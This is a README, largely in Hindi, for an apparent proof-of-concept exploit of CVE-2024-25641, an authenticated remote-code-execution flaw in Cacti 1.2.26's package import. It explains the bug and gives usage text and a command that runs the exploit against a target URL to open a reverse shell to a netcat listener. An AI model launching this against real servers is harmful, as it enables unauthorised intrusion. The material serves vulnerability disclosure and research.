
CVE-2024-25641 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Cacti 1.2.26 में पैकेज इम्पोर्ट सुविधा के माध्यम से एक प्रमाणित RCE है, जो मनमाना PHP कोड निष्पादन और रिवर्स शेल को सक्षम बनाता है।
# Exploit Title: Cacti 1.2.26 - RCE (Authenticated)
# Date: 06/01/2025
# Exploit Author: D3Ext
# Vendor Homepage: https://cacti.net/
# Software Link: https://github.com/Cacti/cacti/archive/refs/tags/release/1.2.26.zip
# Version: 1.2.26
# Tested on: Kali Linux 2024
# CVE: CVE-2024-25641
इस रिपॉजिटरी में CVE-2024-25641 भेद्यता का एक POC (प्रूफ ऑफ कॉन्सेप्ट) शामिल है, जो Cacti 1.2.26 संस्करण को प्रभावित करती है। यह भेद्यता "पैकेज इम्पोर्ट" सुविधा के माध्यम से शोषणीय है, जो "इम्पोर्ट टेम्पलेट्स" अनुमति वाले प्रमाणित उपयोगकर्ताओं को वेब सर्वर पर मनमाना PHP कोड निष्पादित करने की अनुमति देती है। यह भेद्यता /lib/import.php स्क्रिप्ट में परिभाषित import_package() फ़ंक्शन के भीतर स्थित है। यह एक्सप्लॉइट एक PHP रिवर्स शेल का उपयोग करता है जो दुर्भावनापूर्ण प्लगइन अपलोड होने पर ट्रिगर होता है।
usage: exploit.py [-h] --url URL --user USER --password PASSWORD --lhost LHOST --lport LPORT [--verbose]
CVE-2024-25641 - Cacti 1.2.26 Authenticated RCE
options:
-h, --help show this help message and exit
--url URL URL of the Cacti web root
--user USER username to log in
--password PASSWORD password of the username
--lhost LHOST local host to receive the reverse shell
--lport LPORT local port to receive the reverse shell
--verbose enable verbose
एक netcat लिसनर शुरू करें और फिर एक्सप्लॉइट को इस प्रकार निष्पादित करें:
python3 exploit.py --url <URL> --user <username> --password <password> --lhost <local_host> --lport <local_port>

https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88
https://nvd.nist.gov/vuln/detail/CVE-2024-25641
https://vuldb.com/?id.263978
https://github.com/5ma1l/CVE-2024-25641
https://github.com/Safarchand/CVE-2024-25641
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत है
कॉपीराइट © 2025, D3Ext